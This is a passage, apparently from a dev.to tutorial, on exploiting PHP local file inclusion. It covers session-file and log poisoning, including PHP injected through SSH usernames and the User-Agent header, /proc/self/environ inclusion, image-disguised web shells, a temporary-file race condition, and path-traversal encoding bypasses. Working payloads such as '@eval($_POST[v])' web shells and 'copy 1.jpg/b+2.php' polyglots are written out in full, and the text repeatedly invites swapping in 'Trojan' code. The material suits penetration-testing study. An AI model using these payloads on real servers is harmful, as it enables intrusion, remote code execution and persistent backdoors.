class="n"&gt;abcdefg&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Successful execution leads to a web shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example 2:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;session.php&lt;/code&gt; with controllable user session:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;session_start&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Register a user with &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; and log in with that username. Record PHPSESSID (e.g., &lt;code&gt;r7csmqpu1lul3elgsb6o9g6u1b&lt;/code&gt;). The session file contains the malicious code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" alt=" " width="757" height="128"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Include it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\tmp\tmp\sess_r7csmqpu1lul3elgsb6o9g6u1b&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" alt=" " width="800" height="164"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Log Files
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Access Logs
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the server log storage path, and log files must be readable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Web servers (e.g., Apache) write requests to &lt;code&gt;access.log&lt;/code&gt; and errors to &lt;code&gt;error.log&lt;/code&gt;. Default paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight lua"&gt;&lt;code&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Apache&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Linux&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;httpd&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;httpd&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;
&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Apache&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;D&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;xampp&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;apache&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;D&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;xampp&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;apache&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;
&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;IIS6&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;WINDOWS&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;system32&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Logfiles&lt;/span&gt;
&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;IIS7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="n"&gt;SystemDrive&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;inetpub&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;LogFiles&lt;/span&gt;
&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;nginx&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;usr&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="kd"&gt;local&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;nginx&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;installation&lt;/span&gt; &lt;span class="n"&gt;directory&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Direct requests may cause encoding issues. Use Burp to modify the request, e.g., change &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; to &lt;code&gt;%3C?php%20phpinfo();%20?%3E&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" alt=" " width="800" height="299"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After writing PHP code to &lt;code&gt;/var/log/apache2/access.log&lt;/code&gt;, include it.&lt;/p&gt;

&lt;p&gt;Default configuration file paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="p"&gt;1.&lt;/span&gt; Apache+Linux: /etc/httpd/conf/httpd.conf or /etc/init.d/httpd
&lt;span class="p"&gt;2.&lt;/span&gt; IIS6.0+Win2003: C:/Windows/system32/inetsrv/metabase.xml
&lt;span class="p"&gt;3.&lt;/span&gt; IIS7.0+WIN: C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\c&lt;/span&gt;onfig&lt;span class="se"&gt;\a&lt;/span&gt;pplicationHost.config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code, encode as needed, and include.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Log
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the SSH log location and have read access. Default: &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Connect via SSH:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh &lt;span class="s1"&gt;'&amp;lt;?php phpinfo(); ?&amp;gt;'&lt;/span&gt;@remotehost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enter any password. The PHP code is written to the SSH log.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" alt=" " width="798" height="111"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include the log file.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" alt=" " width="607" height="170"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including environ
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;PHP runs as CGI (so that &lt;code&gt;environ&lt;/code&gt; retains the User-Agent header).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;environ&lt;/code&gt; file location is known and readable. Default: &lt;code&gt;/proc/self/environ&lt;/code&gt; (Linux only; not available on Windows).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;/proc/self/environ&lt;/code&gt; saves the User-Agent header. Insert PHP code into the User-Agent, then include the file.&lt;/p&gt;

&lt;p&gt;Example: intercept a request with Burp and modify the User-Agent:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" alt=" " width="800" height="212"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include &lt;code&gt;/proc/self/environ&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" alt=" " width="482" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including fd (File Descriptors)
&lt;/h3&gt;

&lt;p&gt;File descriptors (fd) are non‑negative integers returned by the kernel when a file is opened. Default location: &lt;code&gt;/proc/self/fd/&lt;/code&gt; (Linux only). Similar to including &lt;code&gt;environ&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Same as including &lt;code&gt;environ&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Uploaded Files
&lt;/h3&gt;

&lt;p&gt;Many websites offer file upload (e.g., avatars, documents). Upload a web shell disguised as an image.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the uploaded file's path and name.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create an image‑based web shell. Two methods:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Using the command line: combine a legitimate image (&lt;code&gt;1.jpg&lt;/code&gt;) with a PHP file (&lt;code&gt;2.php&lt;/code&gt;) containing &lt;code&gt;fputs(fopen('hack.php','w'),'&amp;lt;?php @eval($_POST[v])?&amp;gt;');?&amp;gt;&lt;/code&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   copy 1.jpg/b+2.php 3.jpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Upload &lt;code&gt;3.jpg&lt;/code&gt; to the server (e.g., &lt;code&gt;/upload/202107.jpg&lt;/code&gt;). Then include it:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;   http://x.x.x.x/index.php?page=./upload/202107.jpg
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates &lt;code&gt;hack.php&lt;/code&gt; in the same directory as &lt;code&gt;index.php&lt;/code&gt;, which can be connected with a shell management tool.&lt;/p&gt;

&lt;p&gt;Command execution is also possible.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Temporary Files
&lt;/h3&gt;

&lt;p&gt;Principle diagram:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" alt=" " width="799" height="458"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When PHP uploads a file, a temporary file is created (Linux: &lt;code&gt;/tmp/php[6 random chars]&lt;/code&gt;, Windows: &lt;code&gt;c:\windows\temp&lt;/code&gt;). Compete to include the temporary file before it is deleted.&lt;/p&gt;

&lt;p&gt;The temporary filename can be guessed (Linux randomness flaws; Windows only 65535 possibilities) or obtained from &lt;code&gt;phpinfo&lt;/code&gt; page (PHP variables expose the uploaded file's temporary path and name).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; &lt;code&gt;phpinfo&lt;/code&gt; page and file inclusion vulnerability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Principle:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;When sending a POST with a file block, PHP saves a temporary file (e.g., &lt;code&gt;/tmp/phpXXXXXX&lt;/code&gt;), deleted after request.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;phpinfo&lt;/code&gt; displays all variables, including &lt;code&gt;$_FILES&lt;/code&gt;, revealing the temporary filename.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Technique (Linux only):&lt;/strong&gt; Use the script from &lt;a href="https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py" rel="noopener noreferrer"&gt;vulhub/exp.py&lt;/a&gt;. It includes the temporary file, which contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nf"&gt;fileputcontents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'/tmp/p'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'&amp;lt;?=eval($_REQUEST[1])?&amp;gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Successful inclusion creates a permanent file &lt;code&gt;/tmp/p&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" alt=" " width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include &lt;code&gt;/tmp/p&lt;/code&gt; to execute arbitrary commands.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" alt=" " width="800" height="132"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The script uses race conditions: send a large request to &lt;code&gt;phpinfo&lt;/code&gt;, fill with garbage to inflate the output buffer (default 4096 bytes). Read the socket in 4096‑byte chunks; as soon as the temporary filename is found, send the inclusion request before the first socket closes (so the temp file still exists).&lt;/p&gt;

&lt;h3&gt;
  
  
  Other Inclusion Techniques
&lt;/h3&gt;

&lt;p&gt;Web services may use other services (FTP, databases) that produce files. Specific analysis required (e.g., SMTP logs) – not covered here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bypass Techniques
&lt;/h2&gt;

&lt;p&gt;In real scenarios, inclusion is rarely as simple as &lt;code&gt;include $_GET['file'];&lt;/code&gt;. Often, prefixes and suffixes are added. Example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="s1"&gt;'/var/www/html/'&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Bypassing a Fixed Prefix
&lt;/h3&gt;

&lt;p&gt;Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="s1"&gt;'/var/www/html/'&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(Note: On Windows, backslashes in the prefix may cause issues; use forward slashes for directory traversal.)&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Directory Traversal
&lt;/h4&gt;

&lt;p&gt;If &lt;code&gt;/var/log/test.txt&lt;/code&gt; contains &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt;, use &lt;code&gt;../&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;include.php?file&lt;span class="o"&gt;=&lt;/span&gt;../../log/test.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The server concatenates to &lt;code&gt;/var/www/html/../../log/test.txt&lt;/code&gt; → &lt;code&gt;/var/log/test.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" alt=" " width="798" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Encoding Bypass
&lt;/h4&gt;

&lt;p&gt;Servers often filter &lt;code&gt;../&lt;/code&gt;. Encodings can bypass:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. URL encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;../&lt;/code&gt; → &lt;code&gt;%2e%2e%2f&lt;/code&gt;, &lt;code&gt;..%2f&lt;/code&gt;, &lt;code&gt;%2e%2e/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;..\&lt;/code&gt; → &lt;code&gt;%2e%2e%5c&lt;/code&gt;, &lt;code&gt;..%5c&lt;/code&gt;, &lt;code&gt;%2e%2e\&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Double encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;../&lt;/code&gt; → &lt;code&gt;%252e%252e%252f&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;..\&lt;/code&gt; → &lt;code&gt;%252e%252e%255c&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Container/server‑specific encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;..%c0%af&lt;/code&gt; (see &lt;a href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work" rel="noopener noreferrer"&gt;Why does Directory traversal attack %C0%AF work?&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
